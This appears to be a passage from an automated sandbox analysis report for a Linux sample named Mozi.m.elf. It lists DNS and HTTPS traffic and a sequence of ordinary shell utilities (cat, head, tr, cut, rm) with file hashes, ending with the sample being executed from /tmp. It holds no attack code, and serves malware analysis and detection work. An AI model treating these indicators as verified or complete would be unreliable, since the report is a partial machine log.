• 443 (HTTPS)
• 53 (DNS)

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 28, 2025 11:04:20.264374018 CET | 48202 | 443 | 192.168.2.13 | 185.125.190.26
Mar 28, 2025 11:04:51.748344898 CET | 48202 | 443 | 192.168.2.13 | 185.125.190.26

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 28, 2025 11:04:10.302181005 CET | 38259 | 53 | 192.168.2.13 | 8.8.8.8
Mar 28, 2025 11:04:10.302232027 CET | 54420 | 53 | 192.168.2.13 | 8.8.8.8
Mar 28, 2025 11:04:10.390382051 CET | 53 | 54420 | 8.8.8.8 | 192.168.2.13
Mar 28, 2025 11:04:10.390398979 CET | 53 | 38259 | 8.8.8.8 | 192.168.2.13

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 28, 2025 11:04:10.302181005 CET | 192.168.2.13 | 8.8.8.8 | 0x3802 | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
Mar 28, 2025 11:04:10.302232027 CET | 192.168.2.13 | 8.8.8.8 | 0xc2c5 | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 28, 2025 11:04:10.390398979 CET | 8.8.8.8 | 192.168.2.13 | 0x3802 | No error (0) | daisy.ubuntu.com | | 162.213.35.25 | A (IP address) | IN (0x0001) | false
Mar 28, 2025 11:04:10.390398979 CET | 8.8.8.8 | 192.168.2.13 | 0x3802 | No error (0) | daisy.ubuntu.com | | 162.213.35.24 | A (IP address) | IN (0x0001) | false

System Behavior

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/rm
Arguments: rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2X
File size: 72056 bytes
MD5 hash: aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/cat
Arguments: cat /tmp/tmp.23fD2FP8ru
File size: 43416 bytes
MD5 hash: 7e9d213e404ad3bb82e4ebb2e1f2c1b3

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/head
Arguments: head -n 10
File size: 47480 bytes
MD5 hash: fd96a67145172477dd57131396fc9608

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/tr
Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
File size: 51544 bytes
MD5 hash: fbd1402dd9f72d8ebfff00ce7c3a7bb5

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/cut
Arguments: cut -c -80
File size: 47480 bytes
MD5 hash: d8ed0ea8f22c0de0f8692d4d9f1759d3

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/cat
Arguments: cat /tmp/tmp.23fD2FP8ru
File size: 43416 bytes
MD5 hash: 7e9d213e404ad3bb82e4ebb2e1f2c1b3

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/head
Arguments: head -n 10
File size: 47480 bytes
MD5 hash: fd96a67145172477dd57131396fc9608

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/tr
Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
File size: 51544 bytes
MD5 hash: fbd1402dd9f72d8ebfff00ce7c3a7bb5

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/cut
Arguments: cut -c -80
File size: 47480 bytes
MD5 hash: d8ed0ea8f22c0de0f8692d4d9f1759d3

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/dash
Arguments: -
File size: 129816 bytes
MD5 hash: 1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC): 10:03:58
Start date (UTC): 28/03/2025
Path: /usr/bin/rm
Arguments: rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2X
File size: 72056 bytes
MD5 hash: aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC): 10:04:08
Start date (UTC): 28/03/2025
Path: /tmp/Mozi.m.elf
Arguments: /tmp/Mozi.m.elf
File size: 4956856 bytes
MD5 hash: 5ebfcae4fe2471fcc5695c2394773ff1